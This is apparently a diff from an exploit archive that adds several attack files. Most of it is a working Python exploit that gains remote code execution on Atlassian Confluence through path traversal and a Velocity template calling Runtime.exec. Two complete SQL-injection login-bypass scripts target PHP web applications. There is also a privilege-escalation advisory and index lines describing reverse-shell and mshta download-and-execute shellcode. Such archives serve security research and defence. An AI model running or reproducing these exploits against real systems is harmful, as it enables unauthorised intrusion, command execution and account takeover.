self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}"
self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}"
# Following data will be dynamically created while exploit is running
self._space_key = None
self._personal_space_id_url = None
self._space_id = None
self._homepage_id = None
self._atl_token_url = None
self._atl_token = None
self._upload_url = None
self._file_id = None
def generate_payload_location(self):
"""
Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.
See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html
"""
if not self._space_id or not self._homepage_id or not self._file_id:
exit_log(log, "cannot generate payload location without space, homepage and file ID")
space_folder_one = str(int(self._space_id[-3:]) % 250)
space_folder_two = str(int(self._space_id[-6:-3]) % 250)
space_folder_three = self._space_id
page_folder_one = str(int(self._homepage_id[-3:]) % 250)
page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)
page_folder_three = self._homepage_id
file_folder = self._file_id
version = Exploit.DEFAULT_FILE_VERSION
payload_location = f"{self._config.attachment_dir}/" \
f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\
f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \
f"{file_folder}/{version}"
log.debug(f"generated payload location: {payload_location}")
return payload_location
def path_traversal(self, target_remote_path, decode_output=False):
"""
Uses vulnerability in _template parameter to achieve path traversal.
Args:
target_remote_path (string): path on local file system of the target application
decode_output (bool): set to True if output of the file will be character codes separated by new lines,
used with RCE
"""
post_data = {
"contentId": str(random.randint(1, 10000)),
"macro": {
"body": "",
"name": "widget",
"params": {
"_template": f"file://{target_remote_path}",
"url": "https://www.youtube.com/watch?v=" + ''.join(random.choice(
string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))
}
}
}
log.info("sending request towards vulnerable endpoint with payload in '_template' parameter")
response = requests.post(
self._target_url,
headers={
"Content-Type": "application/json; charset=utf-8"
},
json=post_data,
proxies=self._config.proxies,
verify=False,
allow_redirects=False
)
# check if response was proper...
if not response.status_code == 200:
log.debug(f"response code: {response.status_code}")
exit_log(log, "exploit failed")
page_content = response.content
# response is HTML
soup = BeautifulSoup(page_content, features="html.parser")
# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve
# the requested path
error_element = soup.find_all("div", "widget-error")
if error_element:
log.warning("failed to retrieve target path on the system")
log.warning("target path does not exist or application does not have appropriate permissions to view it")
return ""
else:
# otherwise parse out the actual response (file content or directory listing)
output_element = soup.find_all("div", "wiki-content")
if not output_element:
exit_log(log, "application did not return appropriate HTML element")
if not len(output_element) == 1:
log.warning("application unexpectedly returned multiple HTML elements, using the first one")
output_element = output_element[0]
log.debug("extracting HTML element value and stripping the leading and trailing spaces")
# output = output_element.string.strip()
output = output_element.decode_contents().strip()
if "The macro 'widget' is unknown. It may have been removed from the system." in output:
exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable")
if not self._config.script_arguments.silent:
if decode_output:
parsed_output = ""
p = re.compile(r"^([0-9]+)")
for line in output.split("\n"):
r = p.match(line)
if r:
parsed_output += chr(int(r.group(1)))
print(parsed_output.strip())
else:
print(output)
return output
def find_personal_space_key(self):
"""
Makes request that will return personal space key in the response.
"""
log.debug("checking if user has personal space")
response = requests.get(
self._root_url,
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
)
page_content = response.text
if "Add personal space" in page_content:
log.info(f"user does not have personal space, creating it now...")
response = requests.post(
self._create_personal_space_url,
headers={
"Content-Type": "application/json"
},
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
json={
"spaceUserKey": ""
}
)
if not response.status_code == 200:
log.debug(f"response code: {response.status_code}")
exit_log(log, "failed to create personal space")
log.debug(f"personal space created")
response_data = response.json()
self._space_key = response_data.get("key")
else:
log.info("sending request to find personal space key")
response = requests.get(
self._personal_space_key_url,
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
allow_redirects=False
)
# check if response was proper...
if not response.status_code == 200:
log.debug(f"response code: {response.status_code}")
exit_log(log, "failed to get personal space key")
page_content = response.content
# response is HTML
soup = BeautifulSoup(page_content, features="html.parser")
personal_space_link_element = soup.find("a", id="view-personal-space-link")
if not personal_space_link_element or not personal_space_link_element.has_attr("href"):
exit_log(log, "failed to find personal space link in the response, does the user have personal space?")
path = personal_space_link_element["href"]
p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)
r = p.match(path)
if r:
self._space_key = r.group(1)
else:
exit_log(log, "failed to find personal space key")
log.debug(f"personal space key: {self._space_key}")
self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \
f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}"
log.debug(f"generated personal space id url: {self._personal_space_id_url}")
def find_personal_space_id_and_homepage_id(self):
"""
Makes request that will return personal space ID and homepage ID in the response.
"""
if self._personal_space_id_url is None:
exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?")
log.info("sending request to find personal space ID and homepage")
response = requests.get(
self._personal_space_id_url,
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
allow_redirects=False
)
# check if response was proper...
if not response.status_code == 200:
log.debug(f"response code: {response.status_code}")
exit_log(log, "failed to get personal space key")
page_content = response.content
# response is JSON
data = json.loads(page_content)
if "results" not in data:
exit_log(log, "failed to find 'result' section in json output")
items = data["results"]
if type(items) is not list or len(items) == 0:
exit_log(log, "no results for personal space id")
personal_space_data = items[0]
if "id" not in personal_space_data:
exit_log(log, "failed to find ID in personal space data")
self._space_id = str(personal_space_data["id"])
log.debug(f"found space id: {self._space_id}")
if "_expandable" not in personal_space_data:
exit_log(log, "failed to find '_expandable' section in personal space data")
personal_space_expandable_data = personal_space_data["_expandable"]
if "homepage" not in personal_space_expandable_data:
exit_log(log, "failed to find homepage in personal space expandable data")
homepage_path = personal_space_expandable_data["homepage"]
p = re.compile(Exploit.HOMEPAGE_REGEX)
r = p.match(homepage_path)
if r:
self._homepage_id = r.group(1)
log.debug(f"found homepage id: {self._homepage_id}")
self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}"
log.debug(f"generated atl token url: {self._atl_token_url}")
self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}"
log.debug(f"generated upload url: {self._upload_url}")
else:
exit_log(log, "failed to find homepage id, homepage path has incorrect format")
def get_csrf_token(self):
"""
Makes request to get the current CSRF token for the session.
"""
if self._atl_token_url is None:
exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?")
log.info("sending request to find CSRF token")
response = requests.get(
self._atl_token_url,
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
allow_redirects=False
)
# check if response was proper...
if not response.status_code == 200:
log.debug(f"response code: {response.status_code}")
exit_log(log, "failed to get personal space key")
page_content = response.content
# response is HTML
soup = BeautifulSoup(page_content, features="html.parser")
atl_token_element = soup.find("input", {"name": "atl_token"})
if not atl_token_element.has_attr("value"):
exit_log(log, "failed to find value for atl_token")
self._atl_token = atl_token_element["value"]
log.debug(f"found CSRF token: {self._atl_token}")
def upload_template(self):
"""
Makes multipart request to upload the template file to the server.
"""
log.info("uploading template to server")
if not self._atl_token:
exit_log(log, "cannot upload a file without CSRF token")
if self._upload_url is None:
exit_log(log, f"upload url is missing, did you call exploit functions in correct order?")
# Velocity template here executes command and then captures the output. Here the output is generated by printing
# character codes one by one in each line. This can be improved for sure but did not have time to investigate
# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern
# webapp' was not working properly. This gets decoded on our python client later.
template = f"""#set( $test = "test" )
#set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}"))
#set($exout = $ex.waitFor())
#set($out = $ex.getInputStream())
#foreach($i in [1..$out.available()])
#set($ch = $out.read())
$ch
#end"""
log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}")
parts = {
"atl_token": (None, self._atl_token),
"file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),
"confirm": "Attach"
}
response = requests.post(
self._upload_url,
cookies=self._config.session_cookie,
proxies=self._config.proxies,
verify=False,
files=parts
)
# for successful upload first a 302 response needs to happen then 200 page is returned with file ID
if response.status_code == 403:
exit_log(log, "got 403, probably problem with CSRF token")
if not len(response.history) == 1 or not response.history[0].status_code == 302:
exit_log(log, "failed to upload the payload")
page_content = response.content
if "Upload Failed" in str(page_content):
exit_log(log, "failed to upload template")
# response is HTML
soup = BeautifulSoup(page_content, features="html.parser")
file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME})
if not file_link_element.has_attr("data-linked-resource-id"):
exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link")
self._file_id = file_link_element["data-linked-resource-id"]
log.debug(f"found file ID: {self._file_id}")
def exploit_path_traversal(config):
"""
This sends one request towards vulnerable server to either get local file content or directory listing.
"""
log.debug("running path traversal exploit")
exploit = Exploit(config)
exploit.path_traversal(config.remote_path)
def exploit_rce(config):
"""This executes multiple steps to gain RCE. Requires a session token.
Steps:
1. find personal space key for the user
2. find personal space ID and homepage ID for the user
3. get CSRF token (generated per session)
4. upload template file with Java code (involves two requests, first one is 302 redirection)
5. use path traversal part of exploit to load and execute local template file
6. profit
"""
log.debug("running RCE exploit")
exploit = Exploit(config)
exploit.find_personal_space_key()
exploit.find_personal_space_id_and_homepage_id()
exploit.get_csrf_token()
exploit.upload_template()
payload_location = exploit.generate_payload_location()
exploit.path_traversal(payload_location, decode_output=True)
if __name__ == "__main__":
# parse arguments and load all configuration items
script_arguments = parse_arguments()
log = Configuration.get_logger(script_arguments.verbosity)
configuration = Configuration(script_arguments)
# printing banner
if not configuration.script_arguments.skip_banner:
print_banner()
if script_arguments.quiet:
log.disabled = True
log.debug("finished parsing CLI arguments")
log.debug("configuration was loaded successfully")
log.debug("starting exploit")
# disabling warning about trusting self sign certificate from python requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# run appropriate function depending on mode
configuration.script_arguments.func(configuration)
log.debug("done!")

58
exploits/php/webapps/49462.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('** LIBRARY SYSTEM 1.0 **')
print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
print('********************************************************')
print('Author - Himanshu Shukla')
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)

82
exploits/php/webapps/49463.py Executable file
View file

@ -0,0 +1,82 @@
# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.0
# Tested On: Ubuntu + XAMPP 7.4.4
# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi
#STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL>
# For Example: python3 exploit.py http://10.9.67.23/final/
#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser.
import time
import sys
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0 !!!')
print('!!! AUTHENTICATION BYPASS !!!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('Author - Himanshu Shukla')
def authbypass(url):
#Authentication Bypass
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
print ("[*]Attempting Authentication Bypass...")
time.sleep(1)
values = {"username":"'or 1 or'","password":""}
r=s.post(url+'login.php', data=values, cookies=cookies)
p=s.get(url+'dashboard.php', cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if ("true_admin" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
print(RED+"[-]Check Your URL", RESET)
if __name__ == "__main__":
if len(sys.argv)!=2:
print(RED+"You Haven't Provided any URL!", RESET)
print("Usage : python3 exploit.py <URL>")
print("Example : python3 exploit.py http://10.9.7.3/final/")
exit()
try:
authbypass(sys.argv[1])
except:
print(RED+"[-]Invalid URL!", RESET)
exit()

70
exploits/windows/local/49453.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
# Date: 08.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: 4.0.1.6(210120)
4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: Our CPS (Car Plate Server) software is an advanced solution that can
be installed on computers and servers and used as an operations centre. It can
create sophisticated traffic control and road safety systems connecting to
stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert
notifications directly to tablets or smartphones, it can receive and transfer
data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution
that offers full integration with main video surveillance software. Our CPS
software connects to the national operations centre and provides law enforcement
authorities with necessary tools to issue alerts. CPS is designed to guarantee
cooperation among different law enforcement agencies. It allows to create a
multi-user environment that manages different hierarchy levels and the related
division of competences.
Desc: The application suffers from an unquoted search path issue impacting the
service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software
application. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the system
root path undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If successful, the
local user's code would execute with the elevated privileges of the application.
Tested on: Microsoft Windows 10 Enterprise
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5621
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php
08.11.2020
--
C:\Users\Smurf>sc qc "Selea CarPlateServer"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Selea CarPlateServer
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Selea CarPlateServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Smurf>

14
files_exploits.csv
View file

@ -11244,6 +11244,7 @@ id,file,description,date,author,type,platform,port
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43649,3 +43650,16 @@ id,file,description,date,author,type,platform,port
49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,
49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple,
49454,exploits/hardware/webapps/49454.txt,"Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS",2021-01-22,LiquidWorm,webapps,hardware,
49455,exploits/hardware/webapps/49455.txt,"Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite",2021-01-22,LiquidWorm,webapps,hardware,
49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",2021-01-22,LiquidWorm,webapps,hardware,
49459,exploits/hardware/webapps/49459.txt,"Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",2021-01-22,Photubias,webapps,java,
49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass Via SQL Injection",2021-01-22,"Himanshu Shukla",webapps,php,
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,

Can't render this file because it is too large.

5
files_shellcodes.csv
View file

@ -1,7 +1,7 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
@ -1028,3 +1028,4 @@ id,file,description,date,author,type,platform
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86

1 id file description date author type platform
2 14113 shellcodes/arm/14113.c Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 49442 shellcodes/linux/49442.c Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes) Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes) 2021-01-19 Guillem Alminyana shellcode linux
4 49446 shellcodes/linux_x86/49446.c Linux/x86 - Socat Bind Shellcode (113 bytes) Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes) 2021-01-20 Felipe Winsnes shellcode linux_x86
5 13241 shellcodes/aix/13241.c AIX - execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
6 13242 shellcodes/bsd/13242.txt BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
7 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
1028 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 2020-07-26 danf42 shellcode linux_x86
1029 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 2020-07-26 Siddharth Sharma shellcode windows_x86
1030 49416 shellcodes/linux/49416.txt Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2021-01-12 ac3 shellcode linux
1031 49466 shellcodes/windows_x86/49466.asm Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) 2021-01-22 Armando Huesca Prida shellcode windows_x86

185
shellcodes/windows_x86/49466.asm Normal file
View file

@ -0,0 +1,185 @@
# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
## Metasploit compatible payload list:
# generic/custom
# generic/debug_trap
# generic/shell_bind_tcp
# generic/shell_reverse_tcp
# generic/tight_loop
# windows/dllinject/bind_hidden_ipknock_tcp
# windows/dllinject/bind_hidden_tcp
# windows/dllinject/bind_ipv6_tcp
# windows/dllinject/bind_ipv6_tcp_uuid
# windows/dllinject/bind_named_pipe
# windows/dllinject/bind_nonx_tcp
# windows/dllinject/bind_tcp
# windows/dllinject/bind_tcp_rc4
# windows/dllinject/bind_tcp_uuid
# windows/dllinject/reverse_hop_http
# windows/dllinject/reverse_http
# windows/dllinject/reverse_http_proxy_pstore
# windows/dllinject/reverse_ipv6_tcp
# windows/dllinject/reverse_nonx_tcp
# windows/dllinject/reverse_ord_tcp
# windows/dllinject/reverse_tcp
# windows/dllinject/reverse_tcp_allports
# windows/dllinject/reverse_tcp_dns
# windows/dllinject/reverse_tcp_rc4
# windows/dllinject/reverse_tcp_rc4_dns
# windows/dllinject/reverse_tcp_uuid
# windows/dllinject/reverse_winhttp
# windows/dns_txt_query_exec
# windows/download_exec
# windows/exec
# windows/loadlibrary
# windows/messagebox
# windows/meterpreter/bind_hidden_ipknock_tcp
# windows/meterpreter/bind_hidden_tcp
# windows/meterpreter/bind_ipv6_tcp
# windows/meterpreter/bind_ipv6_tcp_uuid
# windows/meterpreter/bind_named_pipe
# windows/meterpreter/bind_nonx_tcp
# windows/meterpreter/bind_tcp
# windows/meterpreter/bind_tcp_rc4
# windows/meterpreter/bind_tcp_uuid
# windows/meterpreter/reverse_hop_http
# windows/meterpreter/reverse_http
# windows/meterpreter/reverse_http_proxy_pstore
# windows/meterpreter/reverse_https
# windows/meterpreter/reverse_https_proxy
# windows/meterpreter/reverse_ipv6_tcp
# windows/meterpreter/reverse_named_pipe
# windows/meterpreter/reverse_nonx_tcp
# windows/meterpreter/reverse_ord_tcp
# windows/meterpreter/reverse_tcp
# windows/meterpreter/reverse_tcp_allports
# windows/meterpreter/reverse_tcp_dns
# windows/meterpreter/reverse_tcp_rc4
# windows/meterpreter/reverse_tcp_rc4_dns
# windows/meterpreter/reverse_tcp_uuid
# windows/meterpreter/reverse_winhttp
# windows/meterpreter/reverse_winhttps
# windows/metsvc_bind_tcp
# windows/metsvc_reverse_tcp
# windows/patchupdllinject/bind_hidden_ipknock_tcp
# windows/patchupdllinject/bind_hidden_tcp
# windows/patchupdllinject/bind_ipv6_tcp
# windows/patchupdllinject/bind_ipv6_tcp_uuid
# windows/patchupdllinject/bind_named_pipe
# windows/patchupdllinject/bind_nonx_tcp
# windows/patchupdllinject/bind_tcp
# windows/patchupdllinject/bind_tcp_rc4
# windows/patchupdllinject/bind_tcp_uuid
# windows/patchupdllinject/reverse_ipv6_tcp
# windows/patchupdllinject/reverse_nonx_tcp
# windows/patchupdllinject/reverse_ord_tcp
# windows/patchupdllinject/reverse_tcp
# windows/patchupdllinject/reverse_tcp_allports
# windows/patchupdllinject/reverse_tcp_dns
# windows/patchupdllinject/reverse_tcp_rc4
# windows/patchupdllinject/reverse_tcp_rc4_dns
# windows/patchupdllinject/reverse_tcp_uuid
# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
# windows/patchupmeterpreter/bind_hidden_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
# windows/patchupmeterpreter/bind_named_pipe
# windows/patchupmeterpreter/bind_nonx_tcp
# windows/patchupmeterpreter/bind_tcp
# windows/patchupmeterpreter/bind_tcp_rc4
# windows/patchupmeterpreter/bind_tcp_uuid
